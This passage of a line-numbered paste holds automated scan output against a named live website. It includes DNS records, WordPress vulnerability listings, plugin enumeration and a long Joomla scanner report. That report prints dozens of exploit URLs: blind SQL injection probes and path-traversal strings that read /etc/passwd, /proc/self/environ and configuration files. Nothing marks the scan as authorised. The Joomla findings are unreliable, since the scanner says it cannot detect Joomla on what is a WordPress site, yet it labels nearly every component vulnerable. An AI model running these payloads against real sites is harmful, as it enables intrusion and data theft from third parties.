  583. 3389/tcp filtered ms-wbt-server
  584. ----------------------------------------
  585.  
  586. [+] DNS Records
  587.  
  588. [+] Host Records (A)
  589. www.flybox.co.ilHTTP: (104.31.75.239) AS13335 Cloudflare Inc
  590.  
  591. [+] TXT Records
  592.  
  593. [+] DNS Map: https://dnsdumpster.com/static/map/www.flybox.co.il.png
  594.  
  595. [>] Initiating 3 intel modules
  596. [>] Loading Alpha module (1/3)
  597. [>] Beta module deployed (2/3)
  598. [>] Gamma module initiated (3/3)
  599. No emails found
  600.  
  601. [+] Hosts found in search engines:
  602. ------------------------------------
  603. [-] Resolving hostnames IPs...
  604. [+] Virtual hosts:
  605. -----------------
  606. [>] Crawling the target for fuzzable URLs
  607. [+] Found 4 fuzzable URLs
  608. https://www.flybox.co.il///selected-package/?packageid=1
  609. [>] Using SQLMap api to check for SQL injection vulnerabilities. Don't
  610. worry we are using an online service and it doesn't depend on your internet connection.
  611. This scan will take 2-3 minutes.
  612. [-] None of parameters is vulnerable to SQL injection
  613. [+] These are the URLs having parameters:
  614. https://www.flybox.co.il///selected-package/?packageid=1
  615. https://www.flybox.co.il///selected-package/?packageid=1
  616. https://www.flybox.co.il///selected-package/?packageid=1
  617. https://www.flybox.co.il///selected-package/?packageid=1
  618. +] Target: https://www.flybox.co.il/
  619. [+] Starting: 30/12/2017 22:55:35
  620.  
  621. [+] Server: cloudflare
  622. [+] Uncommon header "Access-Control-Allow-Origin" found, with contents: *
  623. [+] Uncommon header "CF-RAY" found, with contents: 3d5a4dde08fb0efd-EWR
  624.  
  625. [+] XML-RPC Interface available under: https://www.flybox.co.il/xmlrpc.php
  626.  
  627. [+] Found robots.txt file under: https://www.flybox.co.il/robots.txt
  628. [+] Found wp-config.php file under: https://www.flybox.co.il/wp-config.php
  629. [+] Found readme.html file under: https://www.flybox.co.il/readme.html
  630.  
  631. [+] wp-login not detect protection under: https://www.flybox.co.il/wp-login.php
  632.  
  633. [+] Robots available under: https://www.flybox.co.il/robots.txt
  634. -------------------------
  635. User-agent: *
  636. Disallow: /wp-admin/
  637. Allow: /wp-admin/admin-ajax.php
  638.  
  639. -------------------------
  640.  
  641. [+] Running WordPress version: 4.5.6
  642. | Release date: 2017-01-26
  643. | Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
  644. | Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
  645. | Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
  646. | Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
  647. | Reference: http://seclists.org/oss-sec/2017/q1/563
  648. | Fixed in: 4.5.7
  649. | Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
  650. | Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
  651. | Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
  652. | Fixed in: 4.5.7
  653. | Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
  654. | Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
  655. | Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
  656. | Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
  657. | Fixed in: 4.5.7
  658. | Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
  659. | Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
  660. | Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
  661. | Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
  662. | Reference: http://seclists.org/oss-sec/2017/q1/562
  663. | Reference: https://hackerone.com/reports/153093
  664. | Fixed in: 4.5.7
  665. | Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
  666. | Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
  667. | Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
  668. | Reference: https://core.trac.wordpress.org/ticket/25239
  669. | Fixed in: None
  670. | Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
  671. | Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
  672. | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  673. | Fixed in: 4.5.9
  674. | Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
  675. | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  676. | Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
  677. | Fixed in: 4.5.9
  678. | Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
  679. | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  680. | Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
  681. | Fixed in: 4.5.9
  682. | Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
  683. | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  684. | Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
  685. | Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
  686. | Fixed in: 4.5.9
  687. | Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
  688. | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  689. | Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
  690. | Reference: https://hackerone.com/reports/203515
  691. | Reference: https://hackerone.com/reports/203515
  692. | Fixed in: 4.5.9
  693. | Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
  694. | Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
  695. | Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
  696. | Fixed in: 4.5.9
  697. | Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
  698. | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  699. | Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
  700. | Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
  701. | Fixed in: 4.5.10
  702. | Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
  703. | Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
  704. | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  705. | Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
  706. | Reference: https://wpvulndb.com/vulnerabilities/8905
  707. | Fixed in: 4.7.5
  708. | Title: WordPress 2.9.2-4.8.1 - Open Redirect
  709. | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  710. | Reference: https://core.trac.wordpress.org/changeset/41398
  711. | Fixed in: 4.5.10
  712. | Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
  713. | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  714. | Reference: https://core.trac.wordpress.org/changeset/41457
  715. | Fixed in: 4.5.10
  716. | Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
  717. | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  718. | Reference: https://core.trac.wordpress.org/changeset/41448
  719. | Fixed in: 4.5.10
  720. | Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
  721. | Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  722. | Reference: https://core.trac.wordpress.org/changeset/41395
  723. | Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
  724. | Fixed in: 4.5.10
  725. | Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
  726. | Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
  727. | Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
  728. | Reference: https://twitter.com/ircmaxell/status/923662170092638208
  729. | Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
  730. | Fixed in: 4.5.11
  731. | Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
  732. | Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
  733. | Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
  734. | Fixed in: 4.5.12
  735. | Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
  736. | Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
  737. | Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
  738. | Fixed in: 4.5.12
  739. | Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
  740. | Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
  741. | Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
  742. | Fixed in: 4.5.12
  743. | Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
  744. | Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
  745. | Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
  746. | Fixed in: 4.5.12
  747.  
  748.  
  749. [*] Passive enumerate themes..
  750. [+] Name: blue-summit-wp-bootstrap
  751. | Theme Name: Flybox
  752. | Style: https://www.flybox.co.il/wp-content/themes/blue-summit-wp-bootstrap/style.css
  753.  
  754. [*] Passive enumerate plugins..
  755. [+] Name: popup-builder';SG_POPUP_VERSION='2.31_1'<
  756. [+] Name: accordions
  757. | Readme: https://www.flybox.co.il/wp-content/plugins/accordions/readme.txt
  758. Target: http://flybox.co.il
  759.  
  760. Server: cloudflare
  761. X-Powered-By: PHP/7.0.13
  762.  
  763.  
  764. ## Checking if the target has deployed an Anti-Scanner measure
  765.  
  766. [!] Scanning Passed ..... OK
  767.  
  768.  
  769. ## Detecting Joomla! based Firewall ...
  770.  
  771. [!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
  772. [!] The vulnerability probing may be logged and protected.
  773.  
  774. [!] A Joomla! J-Firewall (com_jfw) is detected.
  775. [!] The vulnerability probing may be logged and protected.
  776.  
  777. [!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
  778. [!] The vulnerability probing may be logged and protected.
  779.  
  780. [!] A SecureLive Joomla! firewall is detected.
  781. [!] The vulnerability probing may be logged and protected.
  782.  
  783. [!] FWScript(from firewallscript.com) is likely to be used.
  784. [!] The vulnerability probing may be logged and protected.
  785.  
  786. [!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
  787. [!] It is likely that webmaster routinely checks insecurities.
  788.  
  789. [!] A security scanner (com_securityscanner/com_securityscan) is detected.
  790.  
  791. [!] A Joomla! jSecure Authentication is detected.
  792. [!] You need additional secret key to access /administrator directory
  793. [!] Default is jSecure like /administrator/?jSecure ;)
  794.  
  795. [!] A Joomla! GuardXT Security Component is detected.
  796. [!] It is likely that webmaster routinely checks for insecurities.
  797.  
  798. [!] A Joomla! JoomSuite Defender is detected.
  799. [!] The vulnerability probing may be logged and protected.
  800.  
  801.  
  802. ## Fingerprinting in progress ...
  803.  
  804. ~Unable to detect the version. Is it sure a Joomla?
  805.  
  806. ## Fingerprinting done.
  807.  
  808.  
  809.  
  810.  
  811. Vulnerabilities Discovered
  812. ==========================
  813.  
  814. # 1
  815. Info -> Generic: htaccess.txt has not been renamed.
  816. Versions Affected: Any
  817. Check: /htaccess.txt
  818. Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
  819. Vulnerable? Yes
  820.  
  821. # 39
  822. Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
  823. Versions effected: N/A
  824. Check: /components/com_banners/
  825. Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
  826. Vulnerable? Yes
  827.  
  828. # 123
  829. Info -> Component: custompages Remote File Inclusion Vulnerability
  830. Versions Affected: 1.1 <=
  831. Check: /components/com_custompages/
  832. Exploit: /index.php?option=com_custompages&cpage=
  833. Vulnerable? Yes
  834.  
  835. # 207
  836. Info -> Component: com_mycontent Blind SQL Injection Vulnerability
  837. Version Affected: N/A
  838. Check: /components/com_mycontent/
  839. Exploit: /index.php?option=com_mycontent&task=view&id=1+and+1=1::/index.php?option=com_mycontent&task=view&id=1+and+1=2
  840. Vulnerable? Yes
  841.  
  842. # 208
  843. Info -> Component: Joo!BB Blind SQL Injection Vulnerability
  844. Version Affected: 0.5.9 or lower
  845. Check: /components/com_joobb/
  846. Exploit: /index.php?option=com_joobb&view=forum&forum=1+and+1=1::/index.php?option=com_joobb&view=forum&forum=1+and+1=2
  847. Vulnerable? Yes
  848.  
  849. # 209
  850. Info -> Component: acctexp Blind SQL Injection Vulnerability
  851. Version Affected: <= 0.12
  852. Check: /components/com_acctexp/
  853. Exploit: /index.php?option=com_acctexp&task=subscribe&usage=1+and+1=1::/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=2
  854. Vulnerable? Yes
  855.  
  856. # 213
  857. Info -> Component: JooBlog Blind SQL Injection Vulnerability
  858. Version Affected: 0.1.1<=
  859. Check: /components/com_jb2/
  860. Exploit: /index.php?option=com_jb2&view=category&CategoryID=1+and+1=1::/index.php?option=com_jb2&view=category&CategoryID=1+and+1=2
  861. Vulnerable? Yes
  862.  
  863. # 214
  864. Info -> Component: jotloader Blind SQL Injection Vulnerability
  865. Version Affected: 1.2.1.a<=
  866. Check: /components/com_jotloader/
  867. Exploit: /index.php?option=com_jotloader&cid=1+and+1=1::/index.php?option=com_jotloader&cid=1+and+1=2
  868. Vulnerable? Yes
  869.  
  870. # 220
  871. Info -> Component: News Portal Blind SQL Injection Vulnerability
  872. Version Affected: 1.0 <=
  873. Check: /components/com_news_portal/
  874. Exploit: /index.php?option=com_news_portal&Itemid=1+and+1=1::/index.php?option=com_news_portal&Itemid=1+and+1=2
  875. Vulnerable? Yes
  876.  
  877. # 232
  878. Info -> Component: com_ezstore Blind SQL Injection Vulnerability
  879. Version Affected: N/A
  880. Check: /components/com_ezstore/
  881. Exploit: /index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=1::/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=2
  882. Vulnerable? Yes
  883.  
  884. # 243
  885. Info -> Component: Archaic Binary Gallery Directory Traversal Vulnerability
  886. Version Affected: 1.0<=
  887. Check: /components/com_ab_gallery/
  888. Exploit: /index.php?option=com_ab_gallery&Itemid=37&gallery=_NOT_EXIST
  889. Vulnerable? Yes
  890.  
  891.  
  892. # 248
  893. Info -> Component: ProDesk (com_pro_desk) Local File Inclusion Vulnerability
  894. Version Affected: 1.2<=
  895. Check: /components/com_pro_desk/
  896. Exploit: /index.php?option=com_pro_desk&include_file=
  897. Vulnerable? Yes
  898.  
  899. # 264
  900. Info -> Component: Com Profiler Blind SQL Injection Vulnerability
  901. Versions effected: 1.0 RC2 and older
  902. Check: /administrator/components/com_comprofiler/
  903. Exploit: /index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
  904. Vulnerable? Yes
  905.  
  906.  
  907. # 302
  908. Info -> Component: com_ijoomla_archive (catid) Blind SQL Injection Vulnerability
  909. Versions Affected: N/A
  910. Check: /components/com_ijoomla_archive/
  911. Exploit: /index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=1::/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=2
  912. Vulnerable? Yes
  913.  
  914.  
  915. # 339
  916. Info -> Component: com_letterman Remote File Inclusion Vulnerability
  917. Versions effected: N/A
  918. Check: /components/com_letterman/
  919. Exploit: /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=
  920. Vulnerable? Yes
  921.  
  922. # 345
  923. Info -> Component: com_hbssearch Blind SQL Injection Vulnerability
  924. Versions Affected: N/A
  925. Check: /components/com_hbssearch/
  926. Exploit: /index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=1::/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=2
  927. Vulnerable? Yes
  928.  
  929.  
  930. # 348
  931. Info -> Component: com_lowcosthotels (id) Blind SQL Injection Vulnerability
  932. Versions Affect: N/A
  933. Check: /components/com_lowcosthotels/
  934. Exploit: /index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=2
  935. Vulnerable? Yes
  936.  
  937. # 349
  938. Info -> Component: com_allhotels (id) Blind SQL Injection Vulnerability
  939. Versions Affect: N/A
  940. Check: /components/com_allhotels/
  941. Exploit: /index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=2
  942. Vulnerable? Yes
  943.  
  944. # 350
  945. Info -> Component: com_ice(catid) Blind SQL Injection Vulnerability
  946. Versions Affected: N/A
  947. Check: /components/com_ice/
  948. Exploit: /index.php?option=com_ice&catid=1 and 1=1::/index.php?option=com_ice&catid=1 and 1=2
  949. Vulnerable? Yes
  950.  
  951.  
  952. # 355
  953. Info -> Component: com_na_content Blind SQL Injection Vulnerability
  954. Versions effected: v 1.0 <=
  955. Check: /components/com_na_content/
  956. Exploit: /index.php?option=com_na_content&task=view&id=1+and+1=1::/index.php?option=com_na_content&task=view&id=1+and+1=2
  957. Vulnerable? Yes
  958.  
  959. # 375
  960. Info -> Component: PC CookBook Blind SQL Injection Vulnerability
  961. Versions effected: N/A
  962. Check: /components/com_pccookbook/
  963. Exploit: /index.php?option=com_pccookbook&page=viewrecipe&recipe_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
  964. Vulnerable? Yes
  965.  
  966. # 376
  967. Info -> Component: com_waticketsystem Blind SQL Injection Vulnerability
  968. Versions effected: N/A
  969. Check: /components/com_waticketsystem/
  970. Exploit: /index.php?option=com_waticketsystem&act=category&catid=1+and+1=1::/index.php?option=com_waticketsystem&act=category&catid=1+and+1=2
  971. Vulnerable? Yes
  972.  
  973. # 379
  974. Info -> Component: com_rss DOS Vulnerability
  975. Versions effected: Joomla! <= 1.0.7
  976. Check: /components/com_rss/
  977. Exploit: /index2.php?option=com_rss&feed=test
  978. Vulnerable? Yes
  979.  
  980.  
  981. # 388
  982. Info -> Component: Seminar com_seminar Blind SQL Injection Vulnerability
  983. Versions effected: 2.0.4 <=
  984. Check: /components/com_seminar/
  985. Exploit: /index.php?option=com_seminar&task=View_seminar&id=1+and+1=1::index.php?option=com_seminar&task=View_seminar&id=1+and+1=2
  986. Vulnerable? Yes
  987.  
  988. # 389
  989. Info -> Component: Omilen Photo Gallery Local File Inclusion Vulnerability
  990. Versions effected: 0.5b <=
  991. Check: /components/com_omphotogallery/
  992. Exploit: /index.php?option=com_omphotogallery&controller=
  993. Vulnerable? Yes
  994.  
  995. # 403
  996. Info -> Component: com_projectfork Local File Inclusion Vulnerability
  997. Versions effected: 2.0.10 <=
  998. Check: /components/com_projectfork/
  999. Exploit: /index.php?option=com_projectfork&section=
  1000. Vulnerable? Yes
  1001.  
  1002.  
  1003. # 437
  1004. Info -> Component: com_clickheat Remote File Inclusion Vulnerability
  1005. Versions effected: N/A
  1006. Check: /components/com_clickheat/
  1007. Exploit: /index.php?option=com_ clickheat&task=
  1008. Vulnerable? Yes
  1009.  
  1010.  
  1011. # 454
  1012. Info -> Component: Almond Classifieds com_aclassf (id) Blind SQL Injection Vulnerability
  1013. Versions effected: 5.6.2 <=
  1014. Check: /components/com_aclassf/
  1015. Exploit: /index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=1::/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=1+and+1=2
  1016. Vulnerable? Yes
  1017.  
  1018. # 455
  1019. Info -> Component: Almond Classifieds com_aclassf (replid) Blind SQL Injection Vulnerability
  1020. Versions effected: 7.5 <=
  1021. Check: /components/com_aclassf/
  1022. Exploit: /index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=1::/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=1+and+1=2
  1023. Vulnerable? Yes
  1024.  
  1025. # 459
  1026. Info -> Component: Kunena Forums com_kunena (func) Blind SQL Injection Vulnerability
  1027. Versions effected: N/A
  1028. Check: /components/com_kunena/
  1029. Exploit: /index.php?option=com_kunena&Itemid=-3&func=1+and+1=1::/index.php?option=com_kunena&Itemid=-3&func=1+and+1=2
  1030. Vulnerable? Yes
  1031.  
  1032. # 460
  1033. Info -> Component: com_misterestate Blind SQL Injection Vulnerability
  1034. Versions effected: N/A
  1035. Check: /components/com_misterestate/
  1036. Exploit: /index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=1::/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component&src_cat=0&country=no&state=no&town=no&district=no&mesearch=Start+Search&searchstring=1%'+and+1=2
  1037. Vulnerable? Yes
  1038.  
  1039.  
  1040. # 468
  1041. Info -> Component: JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities: Local File Inclusion
  1042. Versions Affected: 1.0
  1043. Check: /index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
  1044. Exploit: /index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
  1045. Vulnerable? Yes
  1046.  
  1047. # 475
  1048. Info -> Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion
  1049. Versions Affected: 1.0 Alpha 3
  1050. Check: /index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
  1051. Exploit: /index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
  1052. Vulnerable? Yes
  1053.  
  1054. # 476
  1055. Info -> Component: JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion
  1056. Versions Affected: 1.0 Alpha 3
  1057. Check: /index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
  1058. Exploit: /index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
  1059. Vulnerable? Yes
  1060.  
  1061. # 494
  1062. Info -> Component: Jgrid Local File Inclusion
  1063. Versions Affected: 1.0
  1064. Check: /index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
  1065. Exploit: /index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
  1066. Vulnerable? Yes
  1067.  
  1068. # 523
  1069. Info -> Component: Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability
  1070. Versions Affected: Any
  1071. Check: /index.php?option=com_seyret&view=
  1072. Exploit: /index.php?option=com_seyret&view=
  1073. Vulnerable? Yes
  1074.  
  1075. # 525
  1076. Info -> Component: Joomla Component (com_obSuggest) Local File Inclusion Vulnerability
  1077. Versions Affected: Any
  1078. Check: /index.php?option=com_obsuggest&controller=
  1079. Exploit: /index.php?option=com_obsuggest&controller=
  1080. Vulnerable? Yes
  1081.  
  1082. # 528
  1083. Info -> Component: Joomla Component Matamko Local File Inclusion Vulnerability
  1084. Versions Affected: Any
  1085. Check: /index.php?option=com_matamko&controller=
  1086. Exploit: /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
  1087. Vulnerable? Yes
  1088.  
  1089. # 534
  1090. Info -> Component: Joomla Component (com_jimtawl) Local File Inclusion Vulnerability
  1091. Versions Affected: Any
  1092. Check: /index.php?option=com_jimtawl&Itemid=12&task=
  1093. Exploit: /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00
  1094. Vulnerable? Yes
  1095.  
  1096. # 537
  1097. Info -> Component: Joomla Component (com_connect) Local File Inclusion Vulnerability
  1098. Versions Affected: Any
  1099. Check: /index.php?option=com_connect&view=connect&controller=
  1100. Exploit: /index.php?option=com_connect&view=connect&controller=../../../CREDITS.php%00
  1101. Vulnerable? Yes
  1102.  
  1103. # 538
  1104. Info -> Component: Joomla com_quran SQL Injection vulnerability
  1105. Versions Affected: Any
  1106. Check: /component/quran/index.php?option=com_quran&action=viewayat&surano=
  1107. Exploit: /component/quran/index.php?option=com_quran&action=viewayat&surano=
  1108. Vulnerable? No
  1109.  
  1110. # 544
  1111. Info -> Component: YJ Contact us - Enhanced Joomla Contact Form Local File Inclusion
  1112. Versions Affected: "Any"
  1113. Check: /index.php?option=com_yjcontactus&view=
  1114. Exploit: /index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd%00
  1115. Vulnerable? Yes
  1116.  
  1117. # 546
  1118. Info -> Component: JoomTouch Local File Inclusion
  1119. Versions Affected: 1.0.2
  1120. Check: /index.php?option=com_joomtouch&controller=
  1121. Exploit: /index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00
  1122. Vulnerable? Yes
  1123.  
  1124. # 551
  1125. Info -> Component: Joomla Component FDione Form Wizard Local File Inclusion
  1126. Versions Affected: 1.0.2 <=
  1127. Check: /index.php?option=com_dioneformwizard&controller=[LFI]%00
  1128. Exploit: /index.php?option=com_dioneformwizard&controller=[LFI]%00
  1129. Vulnerable? Yes
  1130.  
  1131. # 553
  1132. Info -> Component: Component advertising Local File Inclusion
  1133. Versions Affected: 2.0 <=
  1134. Check: /index.php?option=com_aardvertiser&cat_name=conf&task=<=
  1135. Exploit: /index.php?option=com_aardvertiser&cat_name=conf&task=
  1136. Vulnerable? Yes
  1137.  
  1138. # 554
  1139. Info -> Component: Component advertising Local File Inclusion
  1140. Versions Affected: 2.0 <=
  1141. Check: /index.php?option=com_aardvertiser&task=
  1142. Exploit: /index.php?option=com_aardvertiser&task=
  1143. Vulnerable? Yes
  1144.  
  1145.  
  1146. # 556
  1147. Info -> Component: Custom PHP Pages Component Local File Inclusion
  1148. Versions Affected: Any <=
  1149. Check: /index.php?option=com_php&file=../images/phplogo.jpg
  1150. Exploit: /index.php?option=com_php&file=../images/phplogo.jpg
  1151. Vulnerable? Yes
  1152.  
  1153. # 557
  1154. Info -> Component: Custom PHP Pages Component Local File Inclusion
  1155. Versions Affected: Any <=
  1156. Check: /index.php?option=com_php&file=../js/ie_pngfix.js
  1157. Exploit: /index.php?option=com_php&file=../js/ie_pngfix.js
  1158. Vulnerable? Yes
  1159.  
  1160. # 558
  1161. Info -> Component: Custom PHP Pages Component Local File Inclusion
  1162. Versions Affected: Any <=
  1163. Check: /index.php?option=com_php&file=../../../../../../../../../../etc/passwd
  1164. Exploit: /index.php?option=com_php&file=../../../../../../../../../../etc/passwd
  1165. Vulnerable? Yes
  1166.  
  1167.  
  1168. # 568
  1169. Info -> Component: SmartSite Local File Inclusion
  1170. Versions Affected: Any <=
  1171. Check: /index.php?option=com_smartsite&controller=
  1172. Exploit: /index.php?option=com_smartsite&controller=
  1173. Vulnerable? Yes
  1174.  
  1175. # 569
  1176. Info -> Component: NoticeBoard Local File Inclusion
  1177. Versions Affected: 1.3<=
  1178. Check: /index.php?option=com_noticeboard&controller=
  1179. Exploit: /index.php?option=com_noticeboard&controller=
  1180. Vulnerable? Yes
  1181.  
  1182. # 570
  1183. Info -> Component: Ultimate Portfolio Local File Inclusion
  1184. Versions Affected: 1.0<=
  1185. Check: /index.php?option=com_ultimateportfolio&controller=
  1186. Exploit: /index.php?option=com_ultimateportfolio&controller=
  1187. Vulnerable? Yes
  1188.  
  1189. # 590
  1190. Info -> Component: Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability
  1191. Versions Affected: Any <=
  1192. Check: /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
  1193. Exploit: /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
  1194. Vulnerable? Yes
  1195.  
  1196. # 591
  1197. Info -> Component: Joomla Component Deluxe Blog Factory com_blogfactory Local File Inclusion Vulnerability
  1198. Versions Affected: Any <=
  1199. Check: /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
  1200. Exploit: /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
  1201. Vulnerable? Yes
  1202.  
  1203. # 592
  1204. Info -> Component: Joomla Component Delicious Bookmarks com_delicious Local File Inclusion Vulnerability
  1205. Versions Affected: Any <=
  1206. Check: /index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
